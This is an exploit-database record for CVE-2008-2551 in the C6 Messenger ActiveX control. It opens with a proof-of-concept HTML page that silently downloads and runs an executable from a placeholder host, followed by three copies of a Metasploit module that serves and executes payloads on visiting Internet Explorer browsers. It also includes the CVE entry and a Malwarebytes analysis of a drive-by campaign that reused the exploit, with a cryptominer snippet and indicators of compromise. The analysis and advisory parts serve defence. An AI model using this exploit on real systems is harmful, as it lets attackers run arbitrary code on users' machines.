ID EDB-ID:5732 Type exploitdb Reporter Nine:Situations:Group Modified 2008-06-03T00:00:00
Description
C6 Messenger ActiveX Remote Download & Execute Exploit. CVE-2008-2551. Remote exploit for windows platform
<!--
C6 Messenger Installation Url DownloaderActiveX Control Remote Download
& Execute Exploit
by
Nine:Situations:Group::SnoopyAssault
site: http://retrogod.altervista.org/
"C6 Messenger is an instant messaging program produced by Telecom Italia Group,
specifically by Alice (distribution), Icon Spa (development, design and server)
and Opendoc (graphics). It is the only instant messenger entirely produced in
Italy, is a free program, allows you to chat in real time with friends[..]"
installation urls:
http://c6.community.alice.it/home/index.html
http://c6.community.alice.it/download/c6.html
Whoever accessed the second one with IE to install c6 IM is vulnerable to this
threat. Notice that you can pass also local urls to "propDownloadUrl" property
and bypass Internet zone, no host check is performed.
"propPostDownloadAction" one is used to launch the executable.
A progress bar is shown but you can easily make it not visible.
settings:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
info:
http://www.google.com/search?hl=en&q=c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61&meta=&num=100&filter=0
Let me guess, this one is already exploited in the wild...
Thanks Mommy Telecom Italia!!
If you think this poc is useful, please help us to improve our equipment and
donate through the paypal button on our site!
--------------------------------------------------------------------------------
Goodbye rgod-tsid-pah he-ru-ka!
-->
<HTML>
<BODY>
<OBJECT ID="DownloaderActiveX1"
WIDTH="0"
HEIGHT="0"
CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61"
CODEBASE="DownloaderActiveX.cab#Version=1,0,0,1">
<PARAM NAME="propProgressBackground" VALUE="#bccee8">
<PARAM NAME="propTextBackground" VALUE="#f7f8fc">
<PARAM NAME="propBarColor" VALUE="#df0203">
<PARAM NAME="propTextColor" VALUE="#000000">
<PARAM NAME="propWidth" VALUE="0">
<PARAM NAME="propHeight" VALUE="0">
<PARAM NAME="propDownloadUrl" VALUE="http://yoursite.com/nc.exe"><!-- change to your favourite kit ! :) -->
<PARAM NAME="propPostDownloadAction" VALUE="run"> <!-- lol -->
<PARAM NAME="propInstallCompleteUrl" VALUE="">
<PARAM NAME="propBrowserRedirectUrl" VALUE="">
<PARAM NAME="propVerbose" VALUE="0">
<PARAM NAME="propInterrupt" VALUE="0">
</OBJECT>
</BODY>
</HTML>
# milw0rm.com [2008-06-03]
{"id": "EDB-ID:5732", "type": "exploitdb", "bulletinFamily": "exploit", "title": "C6 Messenger ActiveX Remote Download & Execute Exploit", "description": "C6 Messenger ActiveX Remote Download & Execute Exploit. CVE-2008-2551. Remote exploit for windows platform", "published": "2008-06-03T00:00:00", "modified": "2008-06-03T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/5732/", "reporter": "Nine:Situations:Group", "references": [], "cvelist": ["CVE-2008-2551"], "lastseen": "2016-01-31T23:30:00", "viewCount": 8, "enchantments": {"score": {"value": 8.0, "vector": "NONE", "modified": "2016-01-31T23:30:00", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-2551"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:109390"]}, {"type": "exploitdb", "idList": ["EDB-ID:18449"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/C6_MESSENGER_DOWNLOADERACTIVEX"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:FD11436A13A56E314FE7438DEDAF9FBA"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:9839"]}], "modified": "2016-01-31T23:30:00", "rev": 2}, "vulnersScore": 8.0}, "sourceHref": "https://www.exploit-db.com/download/5732/", "sourceData": "<!--\n\nC6 Messenger Installation Url DownloaderActiveX Control Remote Download\n& Execute Exploit\n\nby\nNine:Situations:Group::SnoopyAssault\n\nsite: http://retrogod.altervista.org/\n\n\"C6 Messenger is an instant messaging program produced by Telecom Italia Group,\nspecifically by Alice (distribution), Icon Spa (development, design and server)\nand Opendoc (graphics). It is the only instant messenger entirely produced in\nItaly, is a free program, allows you to chat in real time with friends[..]\"\n\ninstallation urls:\nhttp://c6.community.alice.it/home/index.html\nhttp://c6.community.alice.it/download/c6.html\n\nWhoever accessed the second one with IE to install c6 IM is vulnerable to this\nthreat. Notice that you can pass also local urls to \"propDownloadUrl\" property\nand bypass Internet zone, no host check is performed.\n\"propPostDownloadAction\" one is used to launch the executable.\nA progress bar is shown but you can easily make it not visible.\n\nsettings:\nRegKey Safe for Script: False\nRegKey Safe for Init: False\nImplements IObjectSafety: True\nIDisp Safe: Safe for untrusted: caller,data\nIPersist Safe: Safe for untrusted: caller,data\n\ninfo:\nhttp://www.google.com/search?hl=en&q=c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61&meta=&num=100&filter=0\nLet me guess, this one is already exploited in the wild...\nThanks Mommy Telecom Italia!!\n\nIf you think this poc is useful, please help us to improve our equipment and\ndonate through the paypal button on our site!\n\n--------------------------------------------------------------------------------\nGoodbye rgod-tsid-pah he-ru-ka!\n-->\n<HTML>\n<BODY>\n<OBJECT ID=\"DownloaderActiveX1\"\nWIDTH=\"0\"\nHEIGHT=\"0\"\nCLASSID=\"CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61\"\nCODEBASE=\"DownloaderActiveX.cab#Version=1,0,0,1\">\n<PARAM NAME=\"propProgressBackground\" VALUE=\"#bccee8\">\n<PARAM NAME=\"propTextBackground\" VALUE=\"#f7f8fc\">\n<PARAM NAME=\"propBarColor\" VALUE=\"#df0203\">\n<PARAM NAME=\"propTextColor\" VALUE=\"#000000\">\n<PARAM NAME=\"propWidth\" VALUE=\"0\">\n<PARAM NAME=\"propHeight\" VALUE=\"0\">\n<PARAM NAME=\"propDownloadUrl\" VALUE=\"http://yoursite.com/nc.exe\"><!-- change to your favourite kit ! :) -->\n<PARAM NAME=\"propPostDownloadAction\" VALUE=\"run\"> <!-- lol -->\n<PARAM NAME=\"propInstallCompleteUrl\" VALUE=\"\">\n<PARAM NAME=\"propBrowserRedirectUrl\" VALUE=\"\">\n<PARAM NAME=\"propVerbose\" VALUE=\"0\">\n<PARAM NAME=\"propInterrupt\" VALUE=\"0\">\n</OBJECT>\n</BODY>\n</HTML>\n\n# milw0rm.com [2008-06-03]\n", "osvdbidlist": ["45960"], "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:35:14", "description": "The DownloaderActiveX Control (DownloaderActiveX.ocx) in Icona SpA C6 Messenger 1.0.0.1 allows remote attackers to force the download and execution of arbitrary files via a URL in the propDownloadUrl parameter with the propPostDownloadAction parameter set to \"run.\"", "edition": 4, "cvss3": {}, "published": "2008-06-04T23:32:00", "title": "CVE-2008-2551", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2551"], "modified": "2018-10-11T20:41:00", "cpe": ["cpe:/a:icona:instant_messenger:1.0.0.1"], "id": "CVE-2008-2551", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2551", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:icona:instant_messenger:1.0.0.1:*:*:*:*:*:*:*"]}], "metasploit": [{"lastseen": "2020-10-06T04:24:28", "description": "This module exploits a vulnerability in Icona SpA C6 Messenger 1.0.0.1. The vulnerability is in the DownloaderActiveX Control (DownloaderActiveX.ocx). The insecure control can be abused to download and execute arbitrary files in the context of the currently logged-on user.\n", "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-2551"], "modified": "1976-01-01T00:00:00", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/C6_MESSENGER_DOWNLOADERACTIVEX", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute',\n 'Description' => %q{\n This module exploits a vulnerability in Icona SpA C6 Messenger 1.0.0.1. The\n vulnerability is in the DownloaderActiveX Control (DownloaderActiveX.ocx). The\n insecure control can be abused to download and execute arbitrary files in the context of\n the currently logged-on user.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Nine:Situations:Group::SnoopyAssault, vulnerability discovery and exploit\n 'juan vazquez' # metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2008-2551' ],\n [ 'OSVDB', '45960' ],\n [ 'BID', '29519' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => \"none\",\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Payload' =>\n {\n 'Space' => 2048,\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', { } ],\n ],\n 'DisclosureDate' => 'Jun 03 2008',\n 'DefaultTarget' => 0,\n 'Privileged' => false))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n\n # Only IEs are potential targets\n # \"File Session\" is used when the ActiveX tries to request the EXE\n agent = request.headers['User-Agent']\n if agent !~ /MSIE \\d\\.\\d|File Session/\n print_error(\"Target not supported: #{agent}\")\n return\n end\n\n payload_url = \"http://\"\n payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\n payload_url += \":\" + datastore['SRVPORT'].to_s + get_resource() + \"/#{@payload_rand}\"\n\n if (request.uri.match(/#{@payload_rand}/))\n return if ((p = regenerate_payload(cli)) == nil)\n data = generate_payload_exe({ :code => p.encoded })\n print_status(\"Sending EXE payload\")\n send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })\n return\n end\n\n exe = rand_text_alpha(rand(5) + 1 )\n\n content = %Q|\n <html>\n <object id=\"DownloaderActiveX1\" width=\"0\" height=\"0\" classid=\"CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61\" codebase=\"DownloaderActiveX.cab#Version=1,0,0,1\">\n <param name=\"propProgressBackground\" value=\"#bccee8\">\n <param name=\"propTextBackground\" value=\"#f7f8fc\">\n <param name=\"propBarColor\" value=\"#df0203\">\n <param name=\"propTextColor\" value=\"#000000\">\n <param name=\"propWidth\" value=\"0\">\n <param name=\"propHeight\" value=\"0\">\n <param name=\"propDownloadUrl\" value=\"#{payload_url}/#{exe}.exe\">\n <param name=\"propPostDownloadAction\" value=\"run\">\n <param name=\"propInstallCompleteUrl\" value=\"\">\n <param name=\"propBrowserRedirectUrl\" value=\"\">\n <param name=\"propVerbose\" value=\"0\">\n <param name=\"propInterrupt\" value=\"0\">\n </OBJECT>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n send_response_html(cli, content)\n\n handler(cli)\n\n end\n\n def exploit\n @payload_rand = rand_text_alpha(rand(5) + 5 )\n super\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb"}], "packetstorm": [{"lastseen": "2016-12-05T22:12:08", "description": "", "published": "2012-02-03T00:00:00", "type": "packetstorm", "title": "Icona SpA C6 Messenger Downloader Arbitrary File Download / Execute", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-2551"], "modified": "2012-02-03T00:00:00", "id": "PACKETSTORM:109390", "href": "https://packetstormsecurity.com/files/109390/Icona-SpA-C6-Messenger-Downloader-Arbitrary-File-Download-Execute.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute', \n'Description' => %q{ \nThis module exploits a vulnerability in Icona SpA C6 Messenger 1.0.0.1. The \nvulnerability is in the DownloaderActiveX Control (DownloaderActiveX.ocx). The \ninsecure control can be abused to download and execute arbitrary files in the context of \nthe currently logged-on user. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Nine:Situations:Group::SnoopyAssault', # Vulnerability discovery and exploit \n'juan vazquez' # metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2008-2551' ], \n[ 'OSVDB', '45960' ], \n[ 'BID', '29519' ], \n[ 'URL', 'http://retrogod.altervista.org/9sg_c6_download_exec.html' ], \n], \n'DefaultOptions' => \n{ \n'ExitFunction' => \"none\", \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'Payload' => \n{ \n'Space' => 2048, \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic', { } ], \n], \n'DisclosureDate' => 'Jun 03 2008', \n'DefaultTarget' => 0, \n'Privileged' => false)) \nend \n \ndef autofilter \nfalse \nend \n \ndef check_dependencies \nuse_zlib \nend \n \ndef on_request_uri(cli, request) \n \n# Only IEs are potential targets \n# \"File Session\" is used when the ActiveX tries to request the EXE \nagent = request.headers['User-Agent'] \nif agent !~ /MSIE \\d\\.\\d|File Session/ \nprint_error(\"Target not supported: #{cli.peerhost}:#{cli.peerport} (#{agent})\") \nreturn \nend \n \npayload_url = \"http://\" \npayload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] \npayload_url += \":\" + datastore['SRVPORT'] + get_resource() + \"/#{@payload_rand}\" \n \nif (request.uri.match(/#{@payload_rand}/)) \nreturn if ((p = regenerate_payload(cli)) == nil) \ndata = generate_payload_exe({ :code => p.encoded }) \nprint_status(\"Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...\") \nsend_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) \nreturn \nend \n \nexe = rand_text_alpha(rand(5) + 1 ) \n \ncontent = %Q| \n<html> \n<object id=\"DownloaderActiveX1\" width=\"0\" height=\"0\" classid=\"CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61\" codebase=\"DownloaderActiveX.cab#Version=1,0,0,1\"> \n<param name=\"propProgressBackground\" value=\"#bccee8\"> \n<param name=\"propTextBackground\" value=\"#f7f8fc\"> \n<param name=\"propBarColor\" value=\"#df0203\"> \n<param name=\"propTextColor\" value=\"#000000\"> \n<param name=\"propWidth\" value=\"0\"> \n<param name=\"propHeight\" value=\"0\"> \n<param name=\"propDownloadUrl\" value=\"#{payload_url}/#{exe}.exe\"> \n<param name=\"propPostDownloadAction\" value=\"run\"> \n<param name=\"propInstallCompleteUrl\" value=\"\"> \n<param name=\"propBrowserRedirectUrl\" value=\"\"> \n<param name=\"propVerbose\" value=\"0\"> \n<param name=\"propInterrupt\" value=\"0\"> \n</OBJECT> \n</html> \n| \n \nprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\") \n \nsend_response_html(cli, content) \n \nhandler(cli) \n \nend \n \ndef exploit \n@payload_rand = rand_text_alpha(rand(5) + 5 ) \nsuper \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/109390/c6_messenger_downloaderactivex.rb.txt"}], "exploitdb": [{"lastseen": "2016-02-02T09:45:22", "description": "Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute. CVE-2008-2551. Remote exploit for windows platform", "published": "2012-02-02T00:00:00", "type": "exploitdb", "title": "Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-2551"], "modified": "2012-02-02T00:00:00", "id": "EDB-ID:18449", "href": "https://www.exploit-db.com/exploits/18449/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::EXE\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in Icona SpA C6 Messenger 1.0.0.1. The\r\n\t\t\t\tvulnerability is in the DownloaderActiveX Control (DownloaderActiveX.ocx). The\r\n\t\t\t\tinsecure control can be abused to download and execute arbitrary files in the context of\r\n\t\t\t\tthe currently logged-on user.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Nine:Situations:Group::SnoopyAssault', # Vulnerability discovery and exploit\r\n\t\t\t\t\t'juan vazquez' # metasploit module\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2008-2551' ],\r\n\t\t\t\t\t[ 'OSVDB', '45960' ],\r\n\t\t\t\t\t[ 'BID', '29519' ],\r\n\t\t\t\t\t[ 'URL', 'http://retrogod.altervista.org/9sg_c6_download_exec.html' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'ExitFunction' => \"none\",\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f'\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 2048,\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', { } ],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jun 03 2008',\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'Privileged' => false))\r\n\tend\r\n\r\n\tdef autofilter\r\n\t\tfalse\r\n\tend\r\n\r\n\tdef check_dependencies\r\n\t\tuse_zlib\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\t# Only IEs are potential targets\r\n\t\t# \"File Session\" is used when the ActiveX tries to request the EXE\r\n\t\tagent = request.headers['User-Agent']\r\n\t\tif agent !~ /MSIE \\d\\.\\d|File Session/\r\n\t\t\tprint_error(\"Target not supported: #{cli.peerhost}:#{cli.peerport} (#{agent})\")\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tpayload_url = \"http://\"\r\n\t\tpayload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\r\n\t\tpayload_url += \":\" + datastore['SRVPORT'] + get_resource() + \"/#{@payload_rand}\"\r\n\r\n\t\tif (request.uri.match(/#{@payload_rand}/))\r\n\t\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\t\t\tdata = generate_payload_exe({ :code => p.encoded })\r\n\t\t\tprint_status(\"Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...\")\r\n\t\t\tsend_response(cli, data, { 'Content-Type' => 'application/octet-stream' })\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\texe = rand_text_alpha(rand(5) + 1 )\r\n\r\n\t\tcontent = %Q|\r\n\t\t<html>\r\n\t\t\t<object id=\"DownloaderActiveX1\" width=\"0\" height=\"0\" classid=\"CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61\" codebase=\"DownloaderActiveX.cab#Version=1,0,0,1\">\r\n\t\t\t\t<param name=\"propProgressBackground\" value=\"#bccee8\">\r\n\t\t\t\t<param name=\"propTextBackground\" value=\"#f7f8fc\">\r\n\t\t\t\t<param name=\"propBarColor\" value=\"#df0203\">\r\n\t\t\t\t<param name=\"propTextColor\" value=\"#000000\">\r\n\t\t\t\t<param name=\"propWidth\" value=\"0\">\r\n\t\t\t\t<param name=\"propHeight\" value=\"0\">\r\n\t\t\t\t<param name=\"propDownloadUrl\" value=\"#{payload_url}/#{exe}.exe\">\r\n\t\t\t\t<param name=\"propPostDownloadAction\" value=\"run\">\r\n\t\t\t\t<param name=\"propInstallCompleteUrl\" value=\"\">\r\n\t\t\t\t<param name=\"propBrowserRedirectUrl\" value=\"\">\r\n\t\t\t\t<param name=\"propVerbose\" value=\"0\">\r\n\t\t\t\t<param name=\"propInterrupt\" value=\"0\">\r\n\t\t\t</OBJECT>\r\n\t\t</html>\r\n\t\t|\r\n\r\n\t\tprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\")\r\n\r\n\t\tsend_response_html(cli, content)\r\n\r\n\t\thandler(cli)\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\t\t@payload_rand = rand_text_alpha(rand(5) + 5 )\r\n\t\tsuper\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/18449/"}], "malwarebytes": [{"lastseen": "2018-02-22T16:50:35", "bulletinFamily": "blog", "cvelist": ["CVE-2008-2551", "CVE-2008-25511", "CVE-2015-5119", "CVE-2015-51191", "CVE-2016-0189", "CVE-2016-01891"], "description": "During our web crawls we sometimes come across bizarre findings or patterns we haven't seen before. This was the case with a particular drive-by download attack planted on Chinese websites. While by no means advanced (it turned out to be fairly buggy), we witnessed a threat actor experimenting with several different exploits to drop malware.\n\nFor years we have cataloged thousands of Chinese websites injected with the same malicious and rudimentary VBScript code. Even to this day, you can find a countless number of sites that have been (or still are) compromised with that pattern, and most of them happen to be hosted in China.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/urlquery_results.png> \"\" )\n\nThe campaign we stumbled upon starts with sites that were compromised to load external content via scripts and iframe overlays. Although the browser's address bar shows _gusto-delivery[.]com_, there are several injected layers that expose visitors to unwanted code and malware.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/site_view1.png> \"\" )\n\nFor instance, we find a reference to a Coinhive clone_:_\n \n \n var miner = new ProjectPoi.User('LUdKfdXyeXp9sQZf1pphGOrY', 'john-doe', {\n threads: navigator.hardwareConcurrency,\n autoThreads: false,\n throttle: 0.2,\n forceASMJS: false\n });\n miner.start();\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Coinhive_clone1.png> \"\" )\n\nWe are unsure whether this is a pure ripoff (the website template is almost identical), but one is different from the other in that the Chinese version (hosted at _ppoi[.]org_) only takes a 10 percent commission as opposed to 30 percent for Coinhive.\n \n \n \u4e5f\u5c31\u662f\u8bf4\uff0c\u60a8\u5c06\u83b7\u5f97\u6316\u77ff\u6536\u76ca\u768490%\uff0c\u4e0e\u77ff\u6c60\u4e0d\u540c\uff0c\u8fd9\u4e2a\u6536\u76ca\u662f\u56fa\u5b9a\u7684\uff0c\u4e0d\u8bba\u662f\u5426\u7206\u5757\u60a8\u90fd\u5c06\u83b7\u5f97\u8be5\u7b14\u6536\u76ca\n \u6211\u4eec\u5e0c\u671b\u4fdd\u755910%\u6765\u8865\u507f\u4e0d\u7206\u5757\u7684\u635f\u5931\uff0c\u7ef4\u6301\u670d\u52a1\u5668\u7684\u8fd0\u884c\u7b49\n \n I.e. you get 90% of the average XMR we earn. Unlike a traditional mining pool, this\n rate is fixed, regardless of actual blocks found and the luck involved finding them. \n We keep 10% for us to operate this service and to (hopefully) turn a profit.\n\nFinally, the most interesting aspect here is the redirection to a server hosting a few exploits as described in the diagram below:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Flow.png> \"\" )\n\nOn top of a late addition of the aforementioned VBScript similar to the ones found on other Chinese websites, we notice the inclusion of 3 exploits targeting older vulnerabilities in an ActiveX component, the Flash Player and Internet Explorer.\n\n**CVE-2008-2551**\n\nThis old CVE is a vulnerability with the C6 Messenger ActiveX control. The threat actor reused the same code already published [here](<https://www.exploit-db.com/exploits/5732/>) and simply altered the DownloadUrl to point to their malicious binary. Users (unless their browser settings have been changed) will be presented with a prompt asking them to install this piece of malware.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/CVE-2008-25511.png> \"\" )\n\n**CVE-2015-5119**\n\nThis is a Flash Player vulnerability affecting Flash up to version 18.0.0.194, which was again lifted from a proof of concept. Its implementation in this particular drive-by is somewhat unstable though and may cause the browser to crash.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/CVE-2015-51191.png> \"\" )\n\n**CVE-2016-0189**\n\nFinally a more interesting CVE, the well-known Internet Explorer God Mode, although for some unexplained reason, the code was commented out.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/CVE-2016-01891.png> \"\" )\n\nThe final payload dropped in this campaign is a DDoS bot, which we will cover in another blog post.\n\n### Conclusion\n\nAlthough we see the use of several exploits, we cannot call this an exploit kit\u2014not even an amateur one. Indeed, the domain serving the exploits appears to be static and the URIs are always the same.\n\nRegardless, it does not prevent threat actors from arranging drive-by attacks by copying and pasting various pieces of code they can find here and there. While not very effective, they may still be able to compromise some legacy systems or machines that have not been patched.\n\n### Indicators of compromise\n\nMalicious redirection\n \n \n vip.rm028[].cn\n by007[.]cn\n\nExploit domain and IP\n \n \n shiquanxian.cn\n 103.85.226.65\n\nCVE-2008-2551\n \n \n 5E3AC16B7F55CA52A7B4872758F19D09BD4994190B9D114D68CAB9F1D9D5B467\n\nCVE-2015-5119\n \n \n D53F3FE4354ACFE7BD12528C20DA513DCEFA98B1D60D939BDE32C0815014137E\n\nPayload\n \n \n 65ABED6C77CC219A090EBEF73D6A526FCCEDAA391FBFDCB4B416D0845B3D0DBC\n\nThe post [Drive-by download campaign targets Chinese websites, experiments with exploits](<https://blog.malwarebytes.com/threat-analysis/2018/02/chinese-criminal-experiments-with-exploits-in-drive-by-download-campaign/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2018-02-22T16:00:00", "published": "2018-02-22T16:00:00", "id": "MALWAREBYTES:FD11436A13A56E314FE7438DEDAF9FBA", "href": "https://blog.malwarebytes.com/threat-analysis/2018/02/chinese-criminal-experiments-with-exploits-in-drive-by-download-campaign/", "type": "malwarebytes", "title": "Drive-by download campaign targets Chinese websites, experiments with exploits", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:32", "bulletinFamily": "software", "cvelist": ["CVE-2009-0550", "CVE-2009-0553", "CVE-2009-0554", "CVE-2009-0551", "CVE-2008-2551", "CVE-2009-0552", "CVE-2008-2540", "CVE-2008-2550"], "description": "Code exexuction, multiple memory corruptions, NTLM relaying.", "edition": 1, "modified": "2009-04-20T00:00:00", "published": "2009-04-20T00:00:00", "id": "SECURITYVULNS:VULN:9839", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9839", "title": "Microsoft Internet Explorer multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
